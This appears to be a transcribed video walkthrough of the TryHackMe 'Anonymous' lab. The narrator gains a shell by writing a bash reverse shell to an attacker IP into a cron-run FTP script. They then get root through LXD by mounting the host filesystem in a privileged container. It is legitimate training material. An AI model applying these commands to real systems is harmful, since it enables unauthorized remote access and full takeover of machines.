Hello guys, welcome to the channel the Amazicellent Hacker. Today I'm going to solve the box anonymous from TryHackMe. Okay, before getting into the walkthrough, please don't forget to subscribe the channel and hit the bell icon. Okay, now I'm the site tryhackme.com. I have already joined the room and also deployed the box. Okay, now let's start the walkthrough with nmap scan. Okay, to perform an nmap scan, just copy the IP and just type sudo nmap-sc to enumerate version -sb to run default scripts and the machine's IP. Okay, let's hit enter. Okay, just wait for the scan to complete. I'm just going to stop here and get the scan results. As you can see here that uh, four ports are opened: port 21 FTP, port 22 SSH, 139 and 445 are SMB. Okay, you kind of can see here that anonymous login is allowed in this FTP server. Okay, now let's just solve few of the tasks first. So first one is enumerate the machine how many ports are open. As we saw that there are 4 ports which are opened, but service is running on port 21 it's FTP. Our service is running on port 139 and 445 SMB. Okay, there is a share on the user's computer. What is it called? Okay, let's start our enumeration with SMB share. Okay, I'm going to use SMB client to just list the share. So you can see that we can just access the SMB share with anonymous username. Okay, no password is required. So account to use guest and authentication label user. So kind of don't need any password for login in SMB server also. Okay, let's try logging in the SMB server. Okay, to do that just type, first of all let's list SMB shares. To do that just type SMB client, that's capital L, and the machine's IP. So in this password section just leave it empty and just hit enter. Okay, as you can see there are 3 shares: print, pix and IPC. Okay, we kind of can access this share pix. Okay, let's see what is there in this inside this share folder pix. So to get inside the SMB share just type SMB client IP and the share name, it's pix. You kind of need to give a forward slash in before IP. Okay, let's hit enter. Okay, in the password section just leave it empty and hit enter. Okay, now we are inside the share pix. As you can see that there are 2 files, corego2.jpg and pupils.jpg. Let's get them. To do that just type mget and star or asterisk. This is a wildcard. It will download all the files in current folder. Yes. Okay, I kind of downloaded both the files in my Kali Linux. Let's exit from the share and let's check what are those files. Okay, so both are image files, corego2.jpg and pupils.jpg. So before getting into extracting data from this image files, let's first kind of enumerate FTP server also. As you can see in nmap scan that we are allowed anonymous login in FTP server. So if we need to do, we might be involved in some steganography also, but let's check FTP server first. FTP in the IP will just ask for username, just type anonymous. In password section just leave it empty and hit enter. Okay, there seems to be a folder named scripts. Let's get inside it. Okay, there are three files: clean.sh, remove underscore file.log, and to do the text. As you can see, this script clean.sh is actually read, writable, and executable by current user. Okay, let's first download all of them and let's check what it does. Now what to do, just type mget and asterisk again. Let me exit it. Let's first check what's this to do the text message. So it says that I really need to disable the anonymous login. It's really not safe. Okay, so I think our previous escalation is okay. So our initial foothold vector is probability FTP server. So let me check log files also. Running cleanup scripts, nothing to delete. There's nothing in here. Let's get the script. What was the script name? Clean.sh. Okay. So we kind of check inside this temp file. So if the value of temp file is equals to 1, or if the value of temp file equals to 0, it kind of echo this message: running cleanup scripts, nothing to delete inside this removed file.log folder. It's here. Running cleanup script, nothing to delete. So that's the file I just get before this file. Okay, if there's something in temp file, then kind of run this script. So it does something, but I don't think that's relevant for our for this box. So now let's try writing a reverse shell maybe. So next what I'm going to do is I'm just going to write a bash reverse shell and just upload that bash reverse shell code in this clean.sh file. And as you can see that FTP server is kind of writable, so I'm going to just upload this clean.sh file in that FTP server. I remove the previous file first. Okay, then let's first append a bash reverse shell code. Let me just open this script with vim. So I'm going to write the reverse shell code in the beginning section. Bash -i greater than and the TCP. So what's the IP? 10.9.86.227. Okay, 10.9.86.227 port 4444. So basically what this script does is just open a TCP port and start connecting with this the IP. What's my Kali IPs and the port number. So I'm next listen in my Kali with a netcat. Just type nc-nvlp and the port number is specified. It's 4444. Okay, now it will try to connect to my Kali Linux, and this path 0 greater than n1 will just redirect standard input and output, which means bash commands and bash output to my Kali Linux. Okay, let's hope it work. Okay, now let's save it. Let's save it first. Okay, now we kind of edit this line in here. Okay, now next let's try to upload this clean.sh file. Again, let's open FTP server. Username anonymous. Okay, so this script kind of run as it grows up at regular interval of time. So first let's upload this in FTP server. To do that, just type put and script name, it's clean.ss. Okay, you can see here that transfer complete, so kind of uploaded this clean.sh that we modified with reverse shellcode in this box, and it kind of executed already, and we got a reverse shell. You can see our next panel. So I got a reverse shell with nameless one at the red anonymous. So that's how we can just get a reverse shell with FTP with upload service enabled or upload permissions enabled. Let me zoom this first. Variable not sent. Okay, it's alright. Let's get the user flag first. So kind of they needed the pictures that we download from SMB share as the initial football vector was FTP. So I'm just gonna leave it. You can just view those pictures also, but I'm not gonna show you. So then paste the user flag. But there was another question also. There's a share on the computer. What is it called? It was text. Okay. Now let's get to privilege escalation path. Let's set a term variable first. So for tmux session is screen. Okay. Now we can just clear the screen. For privilege escalation, I mainly like to check if there are any executables with sudo rex enabled or suid or guid bit enabled. Let's check that first. To do that, let's first check the sudo one. To do that, just type sudo -l. So it says that no TTY present. Okay, let's first import a Python virtual TTY. So let's check if there is Python installed or not. Okay, now to import the TTY shell, just type python -c and import pty.spawn bin dash so it kind of asks for a password, but we don't have any password for. Let's use a nameless one. Okay, there is only one user. Let me just cat. Let's see. PSSWD first. There is FTP service. Okay, there is only one user. It's nameless one. Okay, there's nothing else. Okay, I kind of see this line LXT, so it's kind of LXT is installed in this box. Okay, it's interesting. Okay, let's get groups. Okay, this nameless one user is part of LXT group. Okay, you can type ID, and also you can see here that its GID value is 100H. It means it's part of a LXT group, so I think it's probably the privilege escalation vector. Let me clear the screen. So now let me show you how to escalate privilege using LXT group. Okay, so first of all you need to kind of go to your current system or go to your Kali Linux. So this is my system, so this is my installed Kali Linux. So there are kind of multiple ways to exploit privilege or escalate privilege using LXT, because I'm going to show you the most easiest way and the way that works on most of the system or most of the Linux system. So first of all, you'll need to download the LXT Alpine builder. So what I'm going to do is we're going to just make a new LXC image, and we are going to import that image into a vulnerable box. So, and just enable higher privilege or administrative privilege in that LXT container or LXT image that we create. Okay, so first download LXT Alpine Builder. So I'll just drop the link, GitHub link in the description below. Also, you can just get it from there. Just go to Google and search for LXT Alpine Builder. So here it is, Saggle LXT Alpine Builder. Okay, let's click on it. Let's copy this GitHub link and go to your Kali. Just type git clone and the address that you copied. Okay, now I downloaded the Alpine Builder. Let's get inside the folder. Now next you just have to do is just type sudo, or rather than just change to root user first, just type sudo su and your password. So now I'm a root user. As you can see, I'm a root user. Now just run this script build-alpine / and build alpine. Just run it. If it worked the first time, you just have to do a couple of times. Just download some file and make a compressed zip file. Okay, now let me exit from root user. As you can see here that it creates a gunzip tarball file, alpine version 3.12, something like that. Okay, now what I'm going to do is we're going to transport this alpine file or this tarball from our Kali Linux to vulnerable box. So I'm going to use Python HTTP server to do that. Okay, let me just initialize the Python HTTP server first. To do that, just type sudo python 3 and import module http.server and give a port number. Okay, let me give it 8000. Okay, now let's copy this file name. Okay, now Python server has started. Okay, in the vulnerable box, just use wget to download that file. Okay, let me first check my IP. It's 10.986.27. Okay, wget http 10.986.27. The port number was 8000 and the file name alpine v3 and give the name. Okay, let's download it. Okay, now I started downloading. Let me zoom it. Okay, so here is the tarball file, alpine image. Okay, let me clear the screen first. So now what I'm going to do is we're going to import this alpine image that we created in this box. So to import the image, type the command lxc image import. So give the image name, just use any alias. Okay, I'm going to use alias TryHackMe. Okay, let it run. Okay, now I started importing this LXT image file. Okay, so if this is your first time on LXT on this box, you should also run LXT in it to start your first container. Okay, so LXT service is kind of not running. So to do that, just to start LXT service, just type LXT in it. Okay, just set everything default. Just leave everything default and just keep on hitting enter. Okay, so I have successfully initialized lxt. Okay, now let's check image. So to check the imported image, just type, well, let me clear it first. Just type lxc image. Okay, yes, lxc image list. Okay, so here is the image that we just imported. We name it the AC hacker. So in next step, we are going to create a container, and we are going to just provide higher privilege or administrative privilege to it. Okay, so to do that, just type lxc init. Okay, let me name the container name. Okay, first we need to give the image name. It's AC hacker, and the container name, let me just name it subscribe. Okay, then give command -c, and to just say enable privileges, just type security dot privilege equals to true. So it will enable privileges in this container. I think it's the correct command. Okay, let's hit enter. Okay, now it started or created the container subscribe. So if this step didn't work for you, you need to just again run the command lxc init. Okay, now let's try to configure our container. To do that, just type lxc config device, then add container name is subscribe, and then image name. The image name is the AC hacker. Okay, then give the disk source. This path or source where we are mounting the disk, so we are kind of mounting root directory to this path /mnt root. So we are kind of mounting this lxc container root directory to this folder /mnt/root. Okay, so we need to be recursive to mount each and every file. So just enable recursive, recursive equals to true. I think this is the correct syntax. Let's hit enter. So you can see here that device the AC hacker edit to subscribe. So kind of configure our container also. Okay, now let's start that container. To do that, just type lxc start, and the container is just created. It's subscribe subscrib. Okay, now the container subscribe started. Well, the next command is the important one. It will just execute system commands. So just type lxc exec, the container name, and the command you want to run. So we are kind of going to run shell command. Just type bin sh. So this will probably spawn a root shell. Okay, let's hit enter. Okay, we are kind of now a root user. As you can see here that we successfully escalated the privilege. Let's get the root flag also. Let's go to root directory. So we kind of mounted it in this folder mnt root. So actually root directory is located in here, cd/mnt/root and again root. Okay, so here is our root flag. So let's just add the root text file also and copy it. Alright, kind of successfully completed the box. So here is a congratulations message also. So this was in this video. Thanks for watching it. If there are any queries, leave them in the comment section below, and please don't forget to subscribe to the channel and hit the bell icon. Hope to see you in the next one. Okay, bye.